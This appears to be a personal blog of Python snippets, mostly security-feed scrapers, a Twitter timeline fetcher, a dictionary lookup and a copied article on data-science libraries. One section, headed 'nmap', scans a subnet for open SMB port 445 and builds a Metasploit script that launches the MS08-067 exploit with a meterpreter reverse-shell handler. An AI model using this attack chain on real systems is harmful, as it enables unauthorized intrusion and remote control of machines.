Python to gather news postings

# -*- coding: utf-8 -*-
# coded by sk for me
import re
import requests

url = 'http://www.krcert.or.kr/data/secNoticeList.do'
recvd = requests.get(url)

print '#'*50
print 'KISA' + '#'*20
tbody = re.findall(r'<tbody>.+?</tbody>', recvd.text, re.DOTALL)
for line in tbody:
    temp = re.findall(r'<a href="/data/secNoticeView\.do\?bulletin_writing_sequence=[0-9]{5}">(.+?)</a>', line)
    temp_date = re.findall(r'2016\.[0-9]{2}\.[0-9]{2}', line)
    try:
        for i in range(0, 20):
            print temp[i], temp_date[i]
    except IndexError:
        print 'done'
print '#'*30
print 'USCert' + '#'*20
url = 'https://www.us-cert.gov/ncas/current-activity.xml'
recvd = requests.get(url)
# NOTE: the tag names in the patterns below were stripped when this post was
# published; <item>/<title>/<pubDate> are the standard RSS elements and are
# assumed here.
tbody = re.findall(r'<item>.+?</item>', recvd.text, re.DOTALL)
for line in tbody:
    temp_date = re.findall(r'<pubDate>(.+?)</pubDate>', line)
    temp = re.findall(r'<title>(.+?)</title>', line)
    print temp[0], temp_date[0]
print '#'*30
print 'Krebs' + '#'*20
url = 'https://krebsonsecurity.com/feed/'
recvd = requests.get(url)
tbody = re.findall(r'<item>.+?</item>', recvd.text, re.DOTALL)  # same assumed RSS tags as above
for line in tbody:
    temp_date = re.findall(r'<pubDate>(.+?)</pubDate>', line)
    temp = re.findall(r'<title>(.+?)</title>', line)
    print temp[0], temp_date[0]

print '#'*50
print 'KB-UScert' + '#'*20
url = 'https://www.kb.cert.org/vulfeed'
recvd = requests.get(url)
tbody = re.findall(r'<item>.+?</item>', recvd.text, re.DOTALL)  # same assumed RSS tags as above
for line in tbody:
    temp = re.findall(r'<title>(.+?)</title>', line)
    temp_date = re.findall(r'<pubDate>(.+?)</pubDate>', line)
    print temp[0], temp_date[0]

print '#'*30
print 'USCert Alert' + '#'*20
url = 'https://www.us-cert.gov/ncas/alerts.xml'
recvd = requests.get(url)
tbody = re.findall(r'<item>.+?</item>', recvd.text, re.DOTALL)  # same assumed RSS tags as above
for line in tbody:
    temp_date = re.findall(r'<pubDate>(.+?)</pubDate>', line)
    temp = re.findall(r'<title>(.+?)</title>', line)
    print temp[0], temp_date[0]

print '#'*30
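The tag-scraping pattern used throughout this script can be exercised offline on a static string (Python 3 shown; the feed fragment below is made up for illustration):

```python
import re

# A fabricated RSS fragment standing in for a downloaded feed.
sample = """
<item><title>Example advisory one</title><pubDate>Mon, 07 Mar 2016</pubDate></item>
<item><title>Example advisory two</title><pubDate>Tue, 08 Mar 2016</pubDate></item>
"""

# Isolate each <item> block, then pull the title and date out of each one.
items = re.findall(r'<item>.+?</item>', sample, re.DOTALL)
for item in items:
    title = re.findall(r'<title>(.+?)</title>', item)
    date = re.findall(r'<pubDate>(.+?)</pubDate>', item)
    print(title[0], date[0])
```

Splitting into per-item blocks first keeps the title/date pairs aligned, which is exactly why the live script anchors on a container element before extracting fields.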

Reference – 15 Python Libraries for Data Science

http://ggplot.yhathq.com/


https://www.upwork.com/hiring/data/15-python-libraries-data-science/

BASIC LIBRARIES FOR DATA SCIENCE

These are the basic libraries that transform Python from a general purpose programming language into a powerful and robust tool for data analysis and visualization. Sometimes called the SciPy Stack, they’re the foundation that the more specialized tools are built on.

  1. NumPy is the foundational library for scientific computing in Python, and many of the libraries on this list use NumPy arrays as their basic inputs and outputs. In short, NumPy introduces objects for multidimensional arrays and matrices, as well as routines that allow developers to perform advanced mathematical and statistical functions on those arrays with as little code as possible.
  2. SciPy builds on NumPy by adding a collection of algorithms and high-level commands for manipulating and visualizing data. This package includes functions for computing integrals numerically, solving differential equations, optimization, and more.
  3. Pandas adds data structures and tools that are designed for practical data analysis in finance, statistics, social sciences, and engineering. Pandas works well with incomplete, messy, and unlabeled data (i.e., the kind of data you’re likely to encounter in the real world), and provides tools for shaping, merging, reshaping, and slicing datasets.
  4. IPython extends the functionality of Python’s interactive interpreter with a souped-up interactive shell that adds introspection, rich media, shell syntax, tab completion, and command history retrieval. It also acts as an embeddable interpreter for your programs that can be really useful for debugging. If you’ve ever used Mathematica or MATLAB, you should feel comfortable with IPython.
  5. matplotlib is the standard Python library for creating 2D plots and graphs. It’s pretty low-level, meaning it requires more commands to generate nice-looking graphs and figures than with some more advanced libraries. However, the flip side of that is flexibility. With enough commands, you can make just about any kind of graph you want with matplotlib.
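A quick sketch of the NumPy arrays and vectorized routines described above (assuming NumPy is installed; Python 3):

```python
import numpy as np

# A 2-D array (matrix) and a few of NumPy's vectorized routines.
a = np.arange(6).reshape(2, 3)   # [[0, 1, 2], [3, 4, 5]]
print(a.mean())                  # 2.5
print(a.sum(axis=0))             # column sums: [3 5 7]
print(a @ a.T)                   # 2x2 product of a with its transpose
```

Each of these operations would take an explicit loop in plain Python; with NumPy they are one call each, which is the "as little code as possible" point made above.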

LIBRARIES FOR MACHINE LEARNING

Machine learning sits at the intersection of Artificial Intelligence and statistical analysis. By training computers with sets of real-world data, we’re able to create algorithms that make more accurate and sophisticated predictions, whether we’re talking about getting better driving directions or building computers that can identify landmarks just from looking at pictures. The following libraries give Python the ability to tackle a number of machine learning tasks, from performing basic regressions to training complex neural networks.

  1. scikit-learn builds on NumPy and SciPy by adding a set of algorithms for common machine learning and data mining tasks, including clustering, regression, and classification. As a library, scikit-learn has a lot going for it. Its tools are well-documented and its contributors include many machine learning experts. What’s more, it’s a very curated library, meaning developers won’t have to choose between different versions of the same algorithm. Its power and ease of use make it popular with a lot of data-heavy startups, including Evernote, OKCupid, Spotify, and Birchbox.
  2. Theano uses NumPy-like syntax to optimize and evaluate mathematical expressions. What sets Theano apart is that it takes advantage of the computer’s GPU in order to make data-intensive calculations up to 100x faster than the CPU alone. Theano’s speed makes it especially valuable for deep learning and other computationally complex tasks.
  3. TensorFlow is another high-profile entrant into machine learning, developed by Google as an open-source successor to DistBelief, their previous framework for training neural networks. TensorFlow uses a system of multi-layered nodes that allow you to quickly set up, train, and deploy artificial neural networks with large datasets. It’s what allows Google to identify objects in photos or understand spoken words in its voice-recognition app.
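A minimal sketch of the scikit-learn fit/predict workflow on a toy classification problem (assumes scikit-learn is installed; the data is invented):

```python
from sklearn.neighbors import KNeighborsClassifier

# Toy training data: six 2-D points with two class labels.
X = [[0, 0], [1, 0], [2, 1], [0, 2], [1, 3], [2, 4]]
y = [0, 0, 0, 1, 1, 1]

# Every scikit-learn estimator follows the same fit()/predict() shape.
clf = KNeighborsClassifier(n_neighbors=3)
clf.fit(X, y)
print(clf.predict([[2, 0], [0, 3]]))  # → [0 1]
```

The uniform estimator interface is part of what "very curated" means in practice: swapping in a different classifier usually changes only the constructor line.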

LIBRARIES FOR DATA MINING AND NATURAL LANGUAGE PROCESSING

What if your business doesn’t have the luxury of accessing massive datasets? For many businesses, the data they need isn’t something that can be passively gathered—it has to be extracted either from documents or webpages. The following tools are designed for a variety of related tasks, from mining valuable information from websites to turning natural language into data you can use.

  1. Scrapy is an aptly named library for creating spider bots to systematically crawl the web and extract structured data like prices, contact info, and URLs. Originally designed for web scraping, Scrapy can also extract data from APIs.
  2. NLTK is a set of libraries designed for Natural Language Processing (NLP). NLTK’s basic functions allow you to tag text, identify named entities, and display parse trees, which are like sentence diagrams that reveal parts of speech and dependencies. From there, you can do more complicated things like sentiment analysis and automatic summarization. It also comes with an entire book’s worth of material about analyzing text with NLTK.
  3. Pattern combines the functionality of Scrapy and NLTK in a massive library designed to serve as an out-of-the-box solution for web mining, NLP, machine learning, and network analysis. Its tools include a web crawler; APIs for Google, Twitter, and Wikipedia; and text-analysis algorithms like parse trees and sentiment analysis that can be performed with just a few lines of code.
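The kind of structured extraction Scrapy automates across a whole site can be sketched for a single page with the standard library alone (the HTML snippet is hypothetical; no network access needed; Python 3):

```python
from html.parser import HTMLParser

class LinkCollector(HTMLParser):
    """Collect (href, text) pairs from anchor tags."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None

    def handle_starttag(self, tag, attrs):
        if tag == 'a':
            self._href = dict(attrs).get('href')

    def handle_data(self, data):
        # Text node immediately after an <a ...> is that link's label.
        if self._href is not None:
            self.links.append((self._href, data.strip()))
            self._href = None

page = '<ul><li><a href="/a">First</a></li><li><a href="/b">Second</a></li></ul>'
p = LinkCollector()
p.feed(page)
print(p.links)  # [('/a', 'First'), ('/b', 'Second')]
```

Scrapy adds the crawling loop, request scheduling, and export pipelines on top of this basic extract step.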

LIBRARIES FOR PLOTTING AND VISUALIZATIONS

The best and most sophisticated analysis is meaningless if you can’t communicate it to other people. These libraries build on matplotlib to enable you to easily create more visually compelling and sophisticated graphs, charts, and maps, no matter what kind of analysis you’re trying to do.

  1. Seaborn is a popular visualization library that builds on matplotlib’s foundation. The first thing you’ll notice about Seaborn is that its default styles are much more sophisticated than matplotlib’s. Beyond that, Seaborn is a higher-level library, meaning it’s easier to generate certain kinds of plots, including heat maps, time series, and violin plots.
  2. Bokeh makes interactive, zoomable plots in modern web browsers using JavaScript widgets. Another nice feature of Bokeh is that it comes with three levels of interface, from high-level abstractions that allow you to quickly generate complex plots, to a low-level view that offers maximum flexibility to app developers.
  3. Basemap adds support for simple maps to matplotlib by taking matplotlib’s coordinates and applying them to more than 25 different projections. The library Folium further builds on Basemap and allows for the creation of interactive web maps, similar to the JavaScript widgets created by Bokeh.
  4. NetworkX allows you to create and analyze graphs and networks. It’s designed to work with both standard and nonstandard data formats, which makes it especially efficient and scalable. All this makes NetworkX especially well suited to analyzing complex social networks.
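A minimal matplotlib example rendering to a file (the Agg backend avoids needing a display; assumes matplotlib is installed; Python 3):

```python
import matplotlib
matplotlib.use('Agg')          # headless backend: render to files, no window
import matplotlib.pyplot as plt

xs = range(10)
fig, ax = plt.subplots()
ax.plot(xs, [x * x for x in xs], label='x^2')
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.legend()
fig.savefig('squares.png')     # writes a PNG to the working directory
```

Note how many explicit calls a single labeled line plot takes; libraries like Seaborn wrap exactly this kind of boilerplate.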

These libraries are just a small sample of the tools available to Python developers. If you’re ready to get your data science initiative up and running, you’re going to need the right team. Find a developer who knows the tools and techniques of statistical analysis, or a data scientist with the development skills to work in a production environment. Explore data scientists on Upwork, or learn more about the basics of Big Data.

Twitter List gathering for me

import tweepy
from tweepy import OAuthHandler

API_KEY = ''
API_SECRET = ''
ACCESS_KEY = ''
ACCESS_SECRET = ''

oAuth = tweepy.OAuthHandler(API_KEY, API_SECRET)
oAuth.set_access_token(ACCESS_KEY, ACCESS_SECRET)
api = tweepy.API(auth_handler=oAuth, api_root='/1.1')

if __name__ == "__main__":
    userID = 'xxxxxxx'
    user = api.get_user(userID)
    timeline = api.user_timeline(userID, count=400)

    # PRINT USER'S TIMELINE TWEETS
    for tweet in timeline:
        try:
            texts = tweet.text
            print(texts)
        except AttributeError as e:
            print(e)

    # PRINT USER'S FRIENDS IDs
    for friend in user.friends(count=200):
        print(friend.id)

Python 2 bytes character for URL

I struggled with 2-byte characters in Python :-0 urllib2.quote(word.encode('UTF-8')) might help for the URL part.


# -*- coding: utf-8 -*-

from bs4 import BeautifulSoup
import urllib2

temp = raw_input("what do you want to search? :::")
word = unicode(temp, 'utf-8')
try:
    url = urllib2.urlopen("http://m.endic.naver.com/search.nhn?searchOption=entryIdiom&query=" + urllib2.quote(word.encode('UTF-8')))
    soup = BeautifulSoup(url, "html.parser", from_encoding='utf-8')
    target = soup.find_all('p', attrs={'class': 'desc'})
    for desc in target:
        print desc.get_text().strip()
except urllib2.HTTPError as e:
    print e
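The quoting step can be checked on its own; in Python 3 the equivalent lives in urllib.parse (the sample word is arbitrary):

```python
from urllib.parse import quote

word = u'사과'  # "apple" in Korean: two 3-byte UTF-8 characters
encoded = quote(word.encode('utf-8'))  # percent-encode the raw UTF-8 bytes
print(encoded)  # %EC%82%AC%EA%B3%BC
```

Encoding to UTF-8 bytes before quoting is the key step: each byte of a multibyte character becomes its own %XX escape, which is what the server expects in a query string.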

nmap

import nmap

def findTgts(subNet):
    nmScan = nmap.PortScanner()
    nmScan.scan(subNet, '445')
    tgtHost = []
    for host in nmScan.all_hosts():
        if nmScan[host].has_tcp(445):
            # the key 'tcp' must be lowercase, not 'TCP'!
            state = nmScan[host]['tcp'][445]['state']
            print state
            if state == 'open':
                print 'Found target host: ' + host
                tgtHost.append(host)
    return tgtHost

findTgts('10.46.145.210-240')

def setuphandler(configFile, lhost, lport):
    configFile.write('use exploit/multi/handler\n')
    configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
    configFile.write('set LPORT ' + str(lport) + '\n')
    configFile.write('set LHOST ' + lhost + '\n')
    configFile.write('exploit -j -z\n')
    configFile.write('set DisablePayloadHandler 1\n')

def confickerExploit(configFile, tgtHost, lhost, lport):
    configFile.write('use exploit/windows/smb/ms08_067_netapi\n')
    # RHOST is the target of the exploit (the original listing put tgtHost in PAYLOAD by mistake)
    configFile.write('set RHOST ' + str(tgtHost) + '\n')
    configFile.write('set LPORT ' + str(lport) + '\n')
    configFile.write('set LHOST ' + lhost + '\n')
    configFile.write('exploit -j -z\n')
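The two functions above just append msfconsole commands to a resource script. The composition step can be sketched on its own with an in-memory file (Python 3; StringIO stands in for the real config file, and the addresses are made up):

```python
from io import StringIO

def setup_handler(cfg, lhost, lport):
    # Mirrors setuphandler() above: a multi/handler waiting for the callback.
    cfg.write('use exploit/multi/handler\n')
    cfg.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
    cfg.write('set LPORT %s\n' % lport)
    cfg.write('set LHOST %s\n' % lhost)
    cfg.write('exploit -j -z\n')

cfg = StringIO()
setup_handler(cfg, '10.0.0.5', 4444)
script = cfg.getvalue()
print(script)
# Written to disk, the script would be run with: msfconsole -r handler.rc
```

Building the resource file programmatically is what lets the scanner output (the tgtHost list from findTgts) drive one exploit stanza per discovered host.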

Python krcert page posting info script

# -*- coding: utf-8 -*-
import re
import requests

url = 'http://www.krcert.or.kr/data/secNoticeList.do'
recvd = requests.get(url)
tbody = re.findall(r'<tbody>.+?</tbody>', recvd.text, re.DOTALL)
for line in tbody:
    temp = re.findall(r'<a href="/data/secNoticeView\.do\?bulletin_writing_sequence=[0-9]{5}">(.+?)</a>', line)
    temp_date = re.findall(r'2016\.[0-9]{2}\.[0-9]{2}', line)
    try:
        for i in range(0, 20):
            print temp[i], temp_date[i]
    except IndexError:
        print 'done'